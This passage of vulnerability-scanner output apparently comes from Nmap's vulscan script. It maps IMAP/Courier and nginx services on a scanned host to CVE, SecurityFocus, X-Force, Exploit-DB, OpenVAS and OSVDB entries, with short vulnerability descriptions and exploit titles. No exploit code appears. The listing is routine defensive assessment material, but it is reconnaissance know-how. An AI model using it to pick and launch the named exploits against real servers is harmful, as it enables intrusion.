7927| [CVE-2002-0436] sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.
7928| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
7929| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
7930| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
7931| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
7932| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
7933| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
7934|
7935| SecurityFocus - https://www.securityfocus.com/bid/:
7936| [84605] Pre Courier And Cargo Business CVE-2008-6054 Remote Security Vulnerability
7937| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
7938| [75469] Courier Mail Server Multiple Memory Corruption Vulnerabilities
7939| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
7940| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
7941| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
7942| [41970] e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities
7943| [32926] Courier-Authlib Non-Latin Character Handling Postgres SQL Injection Vulnerability
7944| [29605] Courier-Authlib Non-Latin Character Handling SQL Injection Vulnerability
7945| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
7946| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
7947| [23589] Courier-IMAP XMAILDIR Shell Command Injection Vulnerability
7948| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
7949| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
7950| [18345] Courier Mail Server Username Encoding Remote Denial Of Service Vulnerability
7951| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
7952| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
7953| [15771] Courier Mail Server Unauthorized Access Vulnerability
7954| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
7955| [14135] Courier Mail Server Remote Denial Of Service Vulnerability
7956| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
7957| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
7958| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
7959| [10976] Courier-IMAP Remote Format String Vulnerability
7960| [9845] Courier Multiple Remote Buffer Overflow Vulnerabilities
7961| [6738] Courier-IMAP Username SQL Injection Vulnerability
7962| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
7963| [6189] Courier SqWebMail File Disclosure Vulnerability
7964| [4908] Courier MTA Long Year Remote Resource Consumption Vulnerability
7965| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
7966| [4269] Sun Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
7967| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
7968| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
7969| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
7970| [130] imapd Buffer Overflow Vulnerability
7971|
7972| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7973| [70325] Cyrus IMAPd NNTP security bypass
7974| [54180] e-Courier CMS multiple scripts cross-site scripting
7975| [54143] e-Courier CMS index.asp cross-site scripting
7976| [47526] UW-imapd rfc822_output_char() denial of service
7977| [47494] Courier Authentication Library Postgres SQL injection
7978| [47436] PRE COURIER &
7979| [43628] Novell OpenSUSE courier-authlib SQL injection
7980| [42950] Courier authentication library username SQL injection
7981| [33805] Gentoo Courier-IMAP command execution
7982| [26998] Courier Mail Server libs/comverp.c usernames denial of service
7983| [23532] Courier Mail Server authentication daemon allows deactivated account access
7984| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
7985| [21565] Courier Mail Server rfc1035/spf.c denial of service
7986| [19460] Cyrus IMAP imapd buffer overflow
7987| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
7988| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
7989| [17034] Courier-IMAP auth_debug format string attack
7990| [15434] Courier Japanese codeset converter buffer overflow
7991| [11213] Courier-IMAP authpgsqllib username SQL injection
7992| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
7993| [10643] Courier sqwebmail mail transport agent (MTA) fails to properly enforce permissions
7994| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
7995| [9228] Courier MTA long year denial of service
7996| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
7997| [7345] Slackware Linux imapd and ipop3d core dump
7998| [573] Imapd denial of service
7999|
8000| Exploit-DB - https://www.exploit-db.com:
8001| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
8002| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
8003| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
8004| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
8005| [21340] Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
8006| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
8007| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
8008| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
8009| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
8010| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
8011| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
8012| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
8013| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
8014| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
8015| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
8016| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
8017| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
8018| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
8019| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
8020| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
8021| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
8022| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
8023| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
8024| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
8025| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
8026| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
8027| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
8028| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
8029| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
8030| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
8031| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
8032| [432] Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
8033| [340] Linux imapd Remote Overflow File Retrieve Exploit
8034|
8035| OpenVAS (Nessus) - http://www.openvas.org:
8036| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
8037| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
8038| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
8039| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
8040| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
8041| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
8042| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
8043| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
8044| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
8045| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
8046| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
8047| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
8048| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
8049| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
8050| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
8051| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
8052| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
8053| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
8054| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
8055| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
8056| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
8057| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
8058| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
8059| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
8060| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
8061| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
8062| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
8063| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
8064| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
8065| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
8066| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
8067| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
8068| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
8069| [66233] SLES10: Security update for Cyrus IMAPD
8070| [66226] SLES11: Security update for Cyrus IMAPD
8071| [66222] SLES9: Security update for Cyrus IMAPD
8072| [65938] SLES10: Security update for Cyrus IMAPD
8073| [65723] SLES11: Security update for Cyrus IMAPD
8074| [65523] SLES9: Security update for Cyrus IMAPD
8075| [65479] SLES9: Security update for cyrus-imapd
8076| [65094] SLES9: Security update for cyrus-imapd
8077| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
8078| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
8079| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
8080| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
8081| [64898] FreeBSD Ports: cyrus-imapd
8082| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
8083| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
8084| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
8085| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
8086| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
8087| [63556] Gentoo Security Advisory GLSA 200903-25 (courier-authlib)
8088| [63063] Debian Security Advisory DSA 1688-2 (courier-authlib)
8089| [63031] Debian Security Advisory DSA 1688-1 (courier-authlib)
8090| [61600] Gentoo Security Advisory GLSA 200809-05 (courier-authlib)
8091| [61192] FreeBSD Ports: courier-authlib
8092| [58224] Gentoo Security Advisory GLSA 200704-18 (courier-imap)
8093| [57856] Gentoo Security Advisory GLSA 200608-06 (Courier)
8094| [57001] Debian Security Advisory DSA 1101-1 (courier)
8095| [55972] Debian Security Advisory DSA 917-1 (courier)
8096| [55807] Slackware Advisory SSA:2005-310-06 imapd
8097| [55421] Debian Security Advisory DSA 820-1 (courier)
8098| [55204] Debian Security Advisory DSA 793-1 (courier)
8099| [55165] Debian Security Advisory DSA 784-1 (courier)
8100| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
8101| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
8102| [54649] Gentoo Security Advisory GLSA 200408-19 (courier-imap)
8103| [54632] Gentoo Security Advisory GLSA 200408-02 (Courier)
8104| [54531] Gentoo Security Advisory GLSA 200403-06 (Courier)
8105| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
8106| [53589] Debian Security Advisory DSA 247-1 (courier)
8107| [53441] Debian Security Advisory DSA 197-1 (courier)
8108| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
8109| [53222] Debian Security Advisory DSA 533-1 (courier)
8110| [52431] FreeBSD Ports: courier
8111| [52418] FreeBSD Ports: courier-imap
8112| [52297] FreeBSD Ports: cyrus-imapd
8113| [52296] FreeBSD Ports: cyrus-imapd
8114| [52295] FreeBSD Ports: cyrus-imapd
8115| [52294] FreeBSD Ports: cyrus-imapd
8116| [52172] FreeBSD Ports: cyrus-imapd
8117|
8118| SecurityTracker - https://www.securitytracker.com:
8119| [1016248] Courier Mailing List Manager Lets Remote Users Deny Service
8120| [1014798] Courier Mail Server Error in Processing SPF Responses May Let Remote Users Deny Service
8121| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
8122| [1010982] Courier-IMAP Format String Flaw in auth_debug() Lets Remote Users Execute Arbitrary Code
8123| [1009455] Courier Mail Server 'iso2022jp' and 'shiftjis' Buffer Overflows May Let Remote Users Execute Arbitrary Code
8124| [1006101] Courier Mail Transfer Agent May Let Remote Users Inject and Execute SQL Statements
8125| [1005639] Courier SqWebMail Privilege Dropping Bug Lets Local Users View Files on the System
8126| [1004433] Courier Mail Server Input Validation Bug Lets Remote Users Send Mail Containing Bogus Dates to Cause the Server to Consume Available CPU Resources
8127|
8128| OSVDB - http://www.osvdb.org:
8129| [86050] Courier Authentication Library (courier-authlib) Multiple Unspecified Issues
8130| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
8131| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
8132| [63879] Courier MTA localmailfilter Error Message Handling Remote DoS
8133| [59669] e-Courier CMS home/your.asp UserGUID Parameter XSS
8134| [59668] e-Courier CMS home/main-whyregister.asp UserGUID Parameter XSS
8135| [59667] e-Courier CMS home/your-register.asp UserGUID Parameter XSS
8136| [59666] e-Courier CMS home/wizard_oe2.asp UserGUID Parameter XSS
8137| [59665] e-Courier CMS home/Wizard_tracking.asp UserGUID Parameter XSS
8138| [59662] e-Courier CMS home/index.asp UserGUID Parameter XSS
8139| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
8140| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
8141| [52906] UW-imapd c-client Initial Request Remote Format String
8142| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
8143| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
8144| [50872] Pre Courier and Cargo Business dbcourior.mdb Direct Request Database Disclosure
8145| [50811] Courier Authentication Library authpgsqllib.c Unspecified SQL Injection
8146| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
8147| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
8148| [48242] Accellion File Transfer Appliance courier/1000@/api_error_email.html Arbitrary Mail Relay
8149| [47516] openSUSE courier-authlib Unspecified SQL Injection
8150| [46049] Courier Authentication Library Username SQL Injection
8151| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
8152| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
8153| [35274] Gentoo courier-imap XMAILDIR Variable Remote Command Injection
8154| [31746] Quick.Cart couriers.php config[db_type] Parameter Traversal Local File Inclusion
8155| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
8156| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
8157| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
8158| [26232] Courier Mail Server Crafted Username Encoding DoS
8159| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
8160| [21541] Courier Mail Server courier-authdaemon Deactivated Account Authentication Bypass
8161| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
8162| [17718] Courier Mail Server DNS SPF Record Lookup Failure Memory Corruption DoS
8163| [14521] Courier sqwebmail Startup Sequence Arbitrary File Access
8164| [13242] UW-imapd CRAM-MD5 Authentication Bypass
8165| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
8166| [12042] UoW imapd Multiple Unspecified Overflows
8167| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
8168| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
8169| [10598] Sun Sunsolve CD Pack sscd_suncourier.pl email Parameter Arbitrary Command Execution
8170| [9506] PostgreSQL Auth Module For Courier User Name Parameter SQL Injection
8171| [9013] Courier-IMAP debug.c auth_debug() Function Remote Format String
8172| [6927] Courier Japanese Codeset shiftjis.c Conversion Overflow
8173| [5052] Double Precision Courier MTA Invalid Year DoS
8174| [4194] Courier Japanese Codeset iso2022jp.c Conversion Overflow
8175| [911] UoW imapd AUTHENTICATE Command Remote Overflow
8176| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
8177| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
8178|_
8179443/tcp open ssl/http nginx
8180| vulscan: VulDB - https://vuldb.com:
8181| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
8182| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
8183| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
8184| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
8185| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
8186| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
8187| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
8188| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
8189| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
8190| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
8191| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
8192| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
8193| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
8194| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
8195| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
8196| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
8197| [67677] nginx up to 1.7.3 SSL weak authentication
8198| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
8199| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
8200| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
8201| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
8202| [65364] nginx up to 1.1.13 Default Configuration information disclosure
8203| [8671] nginx up to 1.4 proxy_pass denial of service
8204| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
8205| [7247] nginx 1.2.6 Proxy Function spoofing
8206| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
8207| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
8208| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
8209| [59645] nginx up to 0.8.9 Heap-based memory corruption
8210| [53592] nginx 0.8.36 memory corruption
8211| [53590] nginx up to 0.8.9 unknown vulnerability
8212| [51533] nginx 0.7.64 Terminal privilege escalation
8213| [50905] nginx up to 0.8.9 directory traversal
8214| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
8215| [50043] nginx up to 0.8.10 memory corruption
8216|
8217| MITRE CVE - https://cve.mitre.org:
8218| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
8219| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
8220| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
8221| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
8222| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
8223| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
8224| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
8225| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
8226| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
8227| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
8228| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
8229| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
8230| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
8231|
8232| SecurityFocus - https://www.securityfocus.com/bid/:
8233| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
8234| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
8235| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
8236| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
8237| [82230] nginx Multiple Denial of Service Vulnerabilities
8238| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
8239| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
8240| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
8241| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
8242| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
8243| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
8244| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
8245| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
8246| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
8247| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
8248| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
8249| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
8250| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
8251| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
8252| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
8253| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
8254| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
8255| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
8256| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
8257| [40420] nginx Directory Traversal Vulnerability
8258| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
8259| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
8260| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
8261| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
8262| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
8263|
8264| IBM X-Force - https://exchange.xforce.ibmcloud.com:
8265| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
8266| [84172] nginx denial of service
8267| [84048] nginx buffer overflow
8268| [83923] nginx ngx_http_close_connection() integer overflow
8269| [83688] nginx null byte code execution
8270| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
8271| [82319] nginx access.log information disclosure
8272| [80952] nginx SSL spoofing
8273| [77244] nginx and Microsoft Windows request security bypass
8274| [76778] Naxsi module for Nginx nx_extract.py directory traversal
8275| [74831] nginx ngx_http_mp4_module.c buffer overflow
8276| [74191] nginx ngx_cpystrn() information disclosure
8277| [74045] nginx header response information disclosure
8278| [71355] nginx ngx_resolver_copy() buffer overflow
8279| [59370] nginx characters denial of service
8280| [59369] nginx DATA source code disclosure
8281| [59047] nginx space source code disclosure
8282| [58966] nginx unspecified directory traversal
8283| [54025] nginx ngx_http_parse.c denial of service
8284| [53431] nginx WebDAV component directory traversal
8285| [53328] Nginx CRC-32 cached domain name spoofing
8286| [53250] Nginx ngx_http_parse_complex_uri() function code execution
8287|
8288| Exploit-DB - https://www.exploit-db.com:
8289| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
8290| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
8291| [25499] nginx 1.3.9-1.4.0 DoS PoC
8292| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
8293| [14830] nginx 0.6.38 - Heap Corruption Exploit
8294| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
8295| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
8296| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
8297| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
8298| [9829] nginx 0.7.61 WebDAV directory traversal
8299|
8300| OpenVAS (Nessus) - http://www.openvas.org:
8301| [864418] Fedora Update for nginx FEDORA-2012-3846
8302| [864310] Fedora Update for nginx FEDORA-2012-6238
8303| [864209] Fedora Update for nginx FEDORA-2012-6411
8304| [864204] Fedora Update for nginx FEDORA-2012-6371
8305| [864121] Fedora Update for nginx FEDORA-2012-4006
8306| [864115] Fedora Update for nginx FEDORA-2012-3991
8307| [864065] Fedora Update for nginx FEDORA-2011-16075
8308| [863654] Fedora Update for nginx FEDORA-2011-16110
8309| [861232] Fedora Update for nginx FEDORA-2007-1158
8310| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
8311| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
8312| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
8313| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
8314| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
8315| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
8316| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
8317| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
